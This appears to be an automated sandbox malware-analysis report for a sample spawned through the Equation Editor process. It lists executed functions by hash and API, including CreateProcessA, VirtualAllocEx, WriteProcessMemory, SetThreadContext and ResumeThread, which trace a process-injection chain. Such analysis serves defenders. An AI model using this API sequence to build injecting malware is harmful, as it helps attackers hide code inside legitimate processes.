Show Windows behavior

Target ID:	9
Start time:	03:25:22
Start date:	30/10/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	16.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.7%
Total number of Nodes:	175
Total number of Limit Nodes:	9

Executed Functions

Function 002C0514 Relevance: 7.6, Strings: 4, Instructions: 2627
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$p, xrefs: 002C1E52
$p, xrefs: 002C1D58
$p, xrefs: 002C1C7E
Ppp, xrefs: 002C1DFE

Memory Dump Source

Source File: 00000005.00000002.406614215.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c0000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID: Ppp$$p$$p$$p
API String ID: 0-2834240603
Opcode ID: 5b47f28023e5636e3dcb5f26f5e4431e99a3ed84fabacc327460e147bf2ca347
Instruction ID: 2ca2696d8c2c8ea8b5a9fcbca41641a5db807af9aa973523e83719c0ef7b5aa6
Opcode Fuzzy Hash: 5b47f28023e5636e3dcb5f26f5e4431e99a3ed84fabacc327460e147bf2ca347
Instruction Fuzzy Hash: 84530574A10619CFDB24DB64C890F9AB7B2FF89304F1146E9E5096B362DB70AE85CF44

Function 002C1141 Relevance: 7.5, Strings: 4, Instructions: 2528
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$p, xrefs: 002C1E52
$p, xrefs: 002C1D58
$p, xrefs: 002C1C7E
Ppp, xrefs: 002C1DFE

Memory Dump Source

Source File: 00000005.00000002.406614215.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c0000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID: Ppp$$p$$p$$p
API String ID: 0-2834240603
Opcode ID: 6319b67912fdff4ae19e4d662cfb520640467d46dd9732aa1397da4fe0d7879f
Instruction ID: fcd031131e04dab91836e1240dcc1f814d510c68cb8e5b3a535efa1e4f5bc738
Opcode Fuzzy Hash: 6319b67912fdff4ae19e4d662cfb520640467d46dd9732aa1397da4fe0d7879f
Instruction Fuzzy Hash: A1430674A10619CFDB24DB64C890F9AB7B2FF8A304F1146E9E5096B361DB70AE85CF44

Function 002C4924 Relevance: 1.6, APIs: 1, Instructions: 105
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 002C89D5

Memory Dump Source

Source File: 00000005.00000002.406614215.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 20cab0599693063e76a9f024d5c8ea67925b5a74bf8ca70df36a3dd151060fc7
Instruction ID: 509e301b8fac875ef30dd97a87732e3cdcd3c3592efa19cc9c7ee471f1885484
Opcode Fuzzy Hash: 20cab0599693063e76a9f024d5c8ea67925b5a74bf8ca70df36a3dd151060fc7
Instruction Fuzzy Hash: 4F4176B9D142589FCF10CFA9D984AEEFBB1BB09310F20902AE814B7310D775A915CF69

Function 002C5CA9 Relevance: .5, Instructions: 511COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406614215.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c0000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edb49257a91bbcd3e58771da2f65610c7a32ddcbd77773eeb48303db79e1756f
Instruction ID: 476bcdc2cda94d4035f8a711e61edaaec601a4fe3f156cb8a20b92ea716999ce
Opcode Fuzzy Hash: edb49257a91bbcd3e58771da2f65610c7a32ddcbd77773eeb48303db79e1756f
Instruction Fuzzy Hash: 83427074E11229CFDB64CFA9C984B9DBBF2BF48310F1482A9D809A7355D774AA81CF50

Function 002C49D9 Relevance: .5, Instructions: 488COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406614215.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c0000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a5b64d779325ae170fb7a511a2cdf01395d08580fe78a3e6d23004061f282d7
Instruction ID: d4d7c45081f77b01106988f50b13d05cf80138b283d4dd9847805fcb55f499ce
Opcode Fuzzy Hash: 9a5b64d779325ae170fb7a511a2cdf01395d08580fe78a3e6d23004061f282d7
Instruction Fuzzy Hash: 9432D574910259CFDB54EF58C580A8EFBB2BF88351F55C69AD448AB212CB30DD85CFA0

Function 002CA298 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406614215.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c0000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bad56bc8ddfd1822d6907e770d9e38ac7cb88d8ac66534c0926b5a90c0179ed
Instruction ID: 82c4db9e3aa7f7d4941dba5e95f01f78d445e5eb1f66e3a8b7ff7919a096d17c
Opcode Fuzzy Hash: 8bad56bc8ddfd1822d6907e770d9e38ac7cb88d8ac66534c0926b5a90c0179ed
Instruction Fuzzy Hash: 04519071E006199FDB08CFEAD844AEEFBB2EF89301F14812AE419AB254D7745A46CF51

Function 002CA28A Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406614215.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c0000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9332631ab7eb84e7475877b5c3f0a1ac7b4a57545e9a0879ff91479d5cfae1fa
Instruction ID: ab293f6392d8fceca1f00e95a006f53ef94dddd92836fe7cde7ba9c0c58a2045
Opcode Fuzzy Hash: 9332631ab7eb84e7475877b5c3f0a1ac7b4a57545e9a0879ff91479d5cfae1fa
Instruction Fuzzy Hash: BB41D171E006498FDB08CFAAC8946EEFBF2AF89300F14C16AD418AB354DB345A46CF51

Function 006E2ADC Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 006E2DAF

Strings

<?h, xrefs: 006E2E32
<?h, xrefs: 006E2EF7
<?h, xrefs: 006E2D02

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: CreateProcess
String ID: <?h$<?h$<?h
API String ID: 963392458-1622368139
Opcode ID: 57b9d4f5e41ca134bb4b49df045790110b1dd05be716c51cd1fa7f28e2478813
Instruction ID: efb0b28997f70c3848815cd72cde6976a6d519602f78743590c8c2b9831f9b08
Opcode Fuzzy Hash: 57b9d4f5e41ca134bb4b49df045790110b1dd05be716c51cd1fa7f28e2478813
Instruction Fuzzy Hash: 1BC14871D0026A8FDF24CFA9C851BEDBBB2BF09300F1095A9D819B7250DB749A85CF91

Function 006E2AE8 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 006E2DAF

Strings

<?h, xrefs: 006E2E32
<?h, xrefs: 006E2EF7
<?h, xrefs: 006E2D02

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: CreateProcess
String ID: <?h$<?h$<?h
API String ID: 963392458-1622368139
Opcode ID: ce5323f11af7239768e1526b72ba141f8cb3204cd0fb94bed2d6d6c2567f47e0
Instruction ID: f6f25fe9fac4bf376563c11027aaca5f70041123409fac773da0eb45519718ec
Opcode Fuzzy Hash: ce5323f11af7239768e1526b72ba141f8cb3204cd0fb94bed2d6d6c2567f47e0
Instruction Fuzzy Hash: A1C13870D0026A8FDF24CFA9C851BEDBBB2BF09300F1095A9D919B7254DB749A85CF91

Function 006E2748 Relevance: 1.6, APIs: 1, Instructions: 120
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 006E2823

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fcd8b64cd93a8175231acf4ea480fb39ed0e4912f66f6c6f0acf76ba6dac0c1e
Instruction ID: dff64248d29ad92b59b165d2adce3270370c5502923f7766779164cbc754382e
Opcode Fuzzy Hash: fcd8b64cd93a8175231acf4ea480fb39ed0e4912f66f6c6f0acf76ba6dac0c1e
Instruction Fuzzy Hash: C041BBB5D012499FCF04CFA9D984AEEFBF2BB49310F20902AE814B7250D334AA45CF64

Function 006E2750 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 006E2823

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e69a6596099def2b2a58242d13046178fcce5bc70a86e6d28fc846598348a80e
Instruction ID: 7fcece3dbbd914cae223b00f6c9a282aaf49a2eb72a8ab6c798474c0a2896d6c
Opcode Fuzzy Hash: e69a6596099def2b2a58242d13046178fcce5bc70a86e6d28fc846598348a80e
Instruction Fuzzy Hash: 1941ABB5D012499FCF04CFA9D984AEEFBF2BB49314F20942AE814B7250D734AA45CF64

Function 006E28B0 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 006E2962

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3cd5a969b01821cceb6e2d88df62d44a1cc1f0c4ca9f9c079eda306bc364b753
Instruction ID: 1132a499867d37d67d2dab02c770e968919bfee276fdb245e6dfa5cb1826c591
Opcode Fuzzy Hash: 3cd5a969b01821cceb6e2d88df62d44a1cc1f0c4ca9f9c079eda306bc364b753
Instruction Fuzzy Hash: 7D41BAB4D002599FCF10CFAAD884AEEFBB2BF49310F14A42AE814B7204C734A945CF64

Function 006E2620 Relevance: 1.6, APIs: 1, Instructions: 105
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 006E26D2

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e9b8421f688a93f05ee7997673d7e88acfc1dd8b36dd6ee7997e1a5afef329a2
Instruction ID: 8b98d5e3d8bdf628cf62ed88d1ddbd172f2dbe6f5cb18024107ce906dcf17f44
Opcode Fuzzy Hash: e9b8421f688a93f05ee7997673d7e88acfc1dd8b36dd6ee7997e1a5afef329a2
Instruction Fuzzy Hash: EF41AAB8D002499FCF10CFA9D984AEEFBB1BB49310F20941AE814BB310D735A946CF65

Function 006E2628 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 006E26D2

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0ce10e79645c19581a9653c5cbd8030a79b33b7605d5f9a3c18c9ebf9c0e0429
Instruction ID: 9faa72ed7ad7d07fd8c0ffdd7a2569709ab8aba10cdb152dc83f0ab5e2370306
Opcode Fuzzy Hash: 0ce10e79645c19581a9653c5cbd8030a79b33b7605d5f9a3c18c9ebf9c0e0429
Instruction Fuzzy Hash: 0241A9B8D002499FCF10CFA9D980AEEFBB5BB49310F20942AE814B7300D735A945CF65

Function 006E24F2 Relevance: 1.6, APIs: 1, Instructions: 97
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 006E25A7

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 46a2aaa84ac3a27694dddab75cde8c5953c7850f4d2b90b9e838db1a84a713cf
Instruction ID: f1acadf531283faa9586c86b3a5e99b8717ab6ec322916bf6d91084968e81755
Opcode Fuzzy Hash: 46a2aaa84ac3a27694dddab75cde8c5953c7850f4d2b90b9e838db1a84a713cf
Instruction Fuzzy Hash: F641BEB4D012599FCB10CFAAD984AEEFBB5BB49314F24802AE414B7244D774A945CF64

Function 006E24F8 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 006E25A7

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7a823a70752f0a5b120ae9bb02a37d82cbb887013078f51cd7f72a65debe9283
Instruction ID: 875208663d12ded782972b33f738d5d496d32584047b52365e2ea3fd0e40da43
Opcode Fuzzy Hash: 7a823a70752f0a5b120ae9bb02a37d82cbb887013078f51cd7f72a65debe9283
Instruction Fuzzy Hash: 5241BDB4D012599FCB10CFAAD984AEEFBB5BB49314F24802AE414B7244D738A945CF64

Function 002C8FAC Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringW.KERNEL32(?), ref: 002C9922

Memory Dump Source

Source File: 00000005.00000002.406614215.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: c2b6a9b0306f06cdf11aa806a27bda29fcb55fb23b31ecdbbcd1c480d92c1085
Instruction ID: b1d93ec6843939209340d81b164503b289534fa242a058d0d44e4f3944795e47
Opcode Fuzzy Hash: c2b6a9b0306f06cdf11aa806a27bda29fcb55fb23b31ecdbbcd1c480d92c1085
Instruction Fuzzy Hash: 173199B4D102099FCF14CFA9D984AEEFBF1AB49310F24916AE818B7310D774A945CFA4

Function 002C9882 Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNEL32(?), ref: 002C9922

Memory Dump Source

Source File: 00000005.00000002.406614215.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: b95ae89adf6971277bae281d59b644fe519928d76ed65c194fb0328ddc2719bf
Instruction ID: 678c724d78e36d3c7af47c16b573731073e6b873fcf90be9739a4178012c9fa9
Opcode Fuzzy Hash: b95ae89adf6971277bae281d59b644fe519928d76ed65c194fb0328ddc2719bf
Instruction Fuzzy Hash: 1231AAB4D142499FCF10CFA9D484AEEFBF1AB49314F24906AE818B7250D374A945CF65

Function 006E2401 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?), ref: 006E2486

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: cf0fb6f97dde9f0a24510eb421f3b693c2eca913fac3a05d518e05da1d455cd4
Instruction ID: f11969a44ef327255b08de683d6b642aa2106079e3220f5ff071ea95c7b5ca87
Opcode Fuzzy Hash: cf0fb6f97dde9f0a24510eb421f3b693c2eca913fac3a05d518e05da1d455cd4
Instruction Fuzzy Hash: 4131DBB4D012499FCF14CFAAD984AAEFBB6BF49314F24842AE814B7340D735A905CF94

Function 006E2408 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?), ref: 006E2486

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2ec2a788ddcf7c26957d19e610412cf0961f1abfe6b6d8f0f7856cbf27e6caaf
Instruction ID: 3a59c8cb58f6ff87d3fe1ffbd10268654b49f4620fc72a7f3ec2c3246c7a02a4
Opcode Fuzzy Hash: 2ec2a788ddcf7c26957d19e610412cf0961f1abfe6b6d8f0f7856cbf27e6caaf
Instruction Fuzzy Hash: 5031EBB4D012499FCF14CFAAD984AEEFBB5AF49314F20842AE814B7340C734A905CFA4

Function 002C8FE8 Relevance: 1.3, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 002C99FE

Memory Dump Source

Source File: 00000005.00000002.406614215.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6aca550c6fcbfcb349b50ab85ea2b9f606c7055c31337cb15ccb21515986219a
Instruction ID: 9f34998c5bc5c12dd1ca0de0d4a0cbf98a63cd5ff7da924e778826bc1961b98a
Opcode Fuzzy Hash: 6aca550c6fcbfcb349b50ab85ea2b9f606c7055c31337cb15ccb21515986219a
Instruction Fuzzy Hash: DF31FEB4D142489FCB11CFA9E484AEEFBF0AF4A314F14849AE815B7361C734A944CFA5

Function 002C997A Relevance: 1.3, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 002C99FE

Memory Dump Source

Source File: 00000005.00000002.406614215.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 0192e905e332070a840f583fbe5b3a5a01846d6504da844e2d05a79eeff4c02f
Instruction ID: 22c4a29732d97b6d673220ef2ce639f1cabbe66df42c377827cac0f77bc7a744
Opcode Fuzzy Hash: 0192e905e332070a840f583fbe5b3a5a01846d6504da844e2d05a79eeff4c02f
Instruction Fuzzy Hash: 1A319AB4D102199FCF10CFA9D484AEEFBF4AB49314F24946AE815B7350C374A945CFA5

Function 002C8FB8 Relevance: 1.3, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 002C99FE

Memory Dump Source

Source File: 00000005.00000002.406614215.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c0000_cmnjgwhesilo61000.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 44765961bbd915b249e8b60c7804c1dcae249f34c810f9584cfaba2f3b918e33
Instruction ID: 3b703642f7d4927e6550691b210afb41d5d7100acf39ffb613c307ef4a9b6593
Opcode Fuzzy Hash: 44765961bbd915b249e8b60c7804c1dcae249f34c810f9584cfaba2f3b918e33
Instruction Fuzzy Hash: 0731BCB4D142189FCB10CFA9D884AEEFBF4AB49310F24906AE815B3310C374A945CFA4

Function 000BD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406491459.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 608ab6d2c8ab1dab92fae3f4da18bb339c4db889abf77549c7d43872a1f1f6a9
Instruction ID: 2687aaae6426538de784ae972d61649cd00cb6e2ab7d3b2fb26ee87bb90bcdcb
Opcode Fuzzy Hash: 608ab6d2c8ab1dab92fae3f4da18bb339c4db889abf77549c7d43872a1f1f6a9
Instruction Fuzzy Hash: 9C21D075614240EFDB25EF14D884B66FFA1EB84314F24C5AAE8494B246D33AD847CBA1

Function 000BD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406491459.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa6bdb78f01b72529165371a98a2e7524ce34fc39c5291aec3293a81e81a2c8f
Instruction ID: 0bc1b541f987789f74162bfe3862b68f6dbdf11559cc779fda1d30efb5b274d7
Opcode Fuzzy Hash: aa6bdb78f01b72529165371a98a2e7524ce34fc39c5291aec3293a81e81a2c8f
Instruction Fuzzy Hash: DF21F2B5604280EFDB15CF14D9C0B66FBA1FB94314F24C5AAE8494B246D336D846CB61

Function 000BD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406491459.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c4ecfa70651a3a3a264d8eef992e427a8c25a8bdd7e3bed9d28c4c52947a570
Instruction ID: edd7362e4ea5c893265a1406beab3ab46836edc9de7fec561d8048f0386772d4
Opcode Fuzzy Hash: 2c4ecfa70651a3a3a264d8eef992e427a8c25a8bdd7e3bed9d28c4c52947a570
Instruction Fuzzy Hash: D7217F755083809FCB02CF14D994B11BFB1EB46314F28C5EAD8498F266D33A985ACB62

Function 000BD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406491459.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction ID: 74c0df4f68bbe237e8ea24911be381634e1c9bc212211b5c834e5c164a5d708b
Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction Fuzzy Hash: 7A11DA75904280DFDB02CF10C9C4B55FFA1FB84314F28CAAED8494B256C33AD84ACBA2

Non-executed Functions

Function 006E0DF8 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

)i, xrefs: 006E0FC6

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID: )i
API String ID: 0-2484720267
Opcode ID: ea5bc263d80101997cfa07a3360b7eb415c681128626c6cd0dd1ed6ad6be9a64
Instruction ID: 0b293ee865cbf0b6d99590cb631324f97e44e07537ccee12a9ab47403bce486f
Opcode Fuzzy Hash: ea5bc263d80101997cfa07a3360b7eb415c681128626c6cd0dd1ed6ad6be9a64
Instruction Fuzzy Hash: 27E1EA74E002598FDB14DFA9C580AADFBB2FF89304F248169D814AB35AD771AD41DFA0

Function 006E1B50 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4821f8b2eb20b129c66ef60aa06a5fc61617e8d4cd908d2c2b042a7e3d76868
Instruction ID: b06e8ebdf1ed7cb2229afdb9bd21fde8170914db6d7aabca9ca33f8854c59989
Opcode Fuzzy Hash: f4821f8b2eb20b129c66ef60aa06a5fc61617e8d4cd908d2c2b042a7e3d76868
Instruction Fuzzy Hash: 13E1E974E002598FDB14DFA9C5809ADFBF2BF89304F248169D815AB35AD730AD42DFA1

Function 006E1230 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f35184eb4e66a1c3e9bdc3c7e57401b686db07de7d8c667fcfc0fb627e97a977
Instruction ID: c37afb31c1c205e2731b9f5bdd8592bbb12c61a3c7c2d68bc09028e33e4d4a4a
Opcode Fuzzy Hash: f35184eb4e66a1c3e9bdc3c7e57401b686db07de7d8c667fcfc0fb627e97a977
Instruction Fuzzy Hash: 9CE1E874E012598FCB14DFA9C5809ADFBF2BF89304F248169D815AB35AD730AD42DFA1

Function 006E1718 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c52700e7d3cbceaf71f3c3c1d2f024f62254651ef525d34eeb6800f15ee68a3
Instruction ID: fdd5c36e692f1da16532c39008a4e24c32ac4cd6afb6980351ca7325c33ec0d9
Opcode Fuzzy Hash: 3c52700e7d3cbceaf71f3c3c1d2f024f62254651ef525d34eeb6800f15ee68a3
Instruction Fuzzy Hash: 04E1EC74E012598FDB14DFA9C5909AEFBF2BF89304F248169D814AB35AD7309D42DFA0

Function 006E09C0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.407225661.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e0000_cmnjgwhesilo61000.jbxd

